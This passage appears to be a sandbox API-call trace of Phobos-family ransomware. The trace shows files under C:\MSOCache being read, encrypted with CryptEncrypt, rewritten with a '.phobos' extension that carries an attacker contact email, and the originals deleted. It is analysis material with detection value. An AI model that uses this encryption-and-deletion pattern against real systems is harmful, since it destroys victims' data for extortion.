hKey=0xa2e518, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0133.761] CryptDestroyKey (hKey=0xa2e518) returned 1 [0133.761] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0133.761] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0133.761] CloseHandle (hObject=0x124) returned 1 [0133.761] CloseHandle (hObject=0x12c) returned 1 [0133.762] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0133.763] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0133.763] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.764] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1457) returned 1 [0133.764] CloseHandle (hObject=0x12c) returned 1 [0133.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 0x2020 [0133.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.764] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.764] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.764] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.764] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.765] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e4d8) returned 1 [0133.765] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.765] ReadFile (in: hFile=0x12c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5b1, lpOverlapped=0x0) returned 1 [0133.806] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5c0, dwBufLen=0x5c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5c0) returned 1 [0133.806] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5c0, lpOverlapped=0x0) returned 1 [0133.807] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2e7b8) returned 1 [0133.807] CryptSetKeyParam (hKey=0xa2e7b8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.807] CryptEncrypt (in: hKey=0xa2e7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0133.807] CryptDestroyKey (hKey=0xa2e7b8) returned 1 [0133.807] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0133.808] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0133.808] CloseHandle (hObject=0x12c) returned 1 [0133.808] CloseHandle (hObject=0x124) returned 1 [0133.808] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0133.809] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0133.809] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.809] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=811) returned 1 [0133.809] CloseHandle (hObject=0x124) returned 1 [0133.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020 [0133.810] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.810] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.810] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.810] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.810] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.811] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e4d8) returned 1 [0133.811] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.811] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x32b, lpOverlapped=0x0) returned 1 [0133.812] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x330, dwBufLen=0x330 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x330) returned 1 [0133.812] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x330, lpOverlapped=0x0) returned 1 [0133.813] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2ea58) returned 1 [0133.813] CryptSetKeyParam (hKey=0xa2ea58, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.813] CryptEncrypt (in: hKey=0xa2ea58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0133.813] CryptDestroyKey (hKey=0xa2ea58) returned 1 [0133.813] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0133.813] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0133.813] CloseHandle (hObject=0x124) returned 1 [0133.813] CloseHandle (hObject=0x12c) returned 1 [0133.814] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0133.815] ResetEvent (hEvent=0x108) returned 1 [0133.815] SetEvent (hEvent=0x10c) returned 1 [0133.815] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0133.815] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.815] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5884) returned 1 [0133.815] CloseHandle (hObject=0x12c) returned 1 [0133.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0133.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0133.815] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0133.815] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.815] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0133.815] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0133.816] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e4d8) returned 1 [0133.816] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0133.816] ReadFile (in: hFile=0x12c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x16fc, lpOverlapped=0x0) returned 1 [0134.391] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1700, dwBufLen=0x1700 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1700) returned 1 [0134.391] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1700, lpOverlapped=0x0) returned 1 [0134.392] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2e408) returned 1 [0134.392] CryptSetKeyParam (hKey=0xa2e408, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0134.392] CryptEncrypt (in: hKey=0xa2e408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0134.392] CryptDestroyKey (hKey=0xa2e408) returned 1 [0134.392] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0134.392] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0134.392] CloseHandle (hObject=0x12c) returned 1 [0134.392] CloseHandle (hObject=0x124) returned 1 [0134.393] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0134.394] ResetEvent (hEvent=0x108) returned 1 [0134.394] SetEvent (hEvent=0x10c) returned 1 [0134.394] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0134.394] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0134.512] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2362) returned 1 [0134.512] CloseHandle (hObject=0x124) returned 1 [0134.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0134.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0134.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0134.513] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0134.513] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0134.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0134.513] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e4d8) returned 1 [0134.513] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0134.513] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x93a, lpOverlapped=0x0) returned 1 [0134.788] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x940, dwBufLen=0x940 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x940) returned 1 [0134.789] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x940, lpOverlapped=0x0) returned 1 [0134.789] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2eb08) returned 1 [0134.789] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0134.789] CryptEncrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0134.789] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0134.790] WriteFile (in: hFile=0x12c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0134.790] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0134.790] CloseHandle (hObject=0x124) returned 1 [0134.790] CloseHandle (hObject=0x12c) returned 1 [0134.790] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0134.791] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0134.791] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0134.792] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1231) returned 1 [0134.792] CloseHandle (hObject=0x12c) returned 1 [0134.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020 [0134.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0134.792] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0134.793] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0134.793] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0134.793] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0134.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e4d8) returned 1 [0134.793] CryptSetKeyParam (hKey=0xa2e4d8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0134.793] ReadFile (in: hFile=0x12c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4cf, lpOverlapped=0x0) returned 1 [0137.310] CryptEncrypt (in: hKey=0xa2e4d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4d0) returned 1 [0137.310] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4d0, lpOverlapped=0x0) returned 1 [0137.311] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa2eb08) returned 1 [0137.311] CryptSetKeyParam (hKey=0xa2eb08, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0137.311] CryptEncrypt (in: hKey=0xa2eb08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0137.311] CryptDestroyKey (hKey=0xa2eb08) returned 1 [0137.311] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0137.312] CryptDestroyKey (hKey=0xa2e4d8) returned 1 [0137.312] CloseHandle (hObject=0x12c) returned 1 [0137.312] CloseHandle (hObject=0x124) returned 1 [0137.312] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0137.314] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0137.314] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, 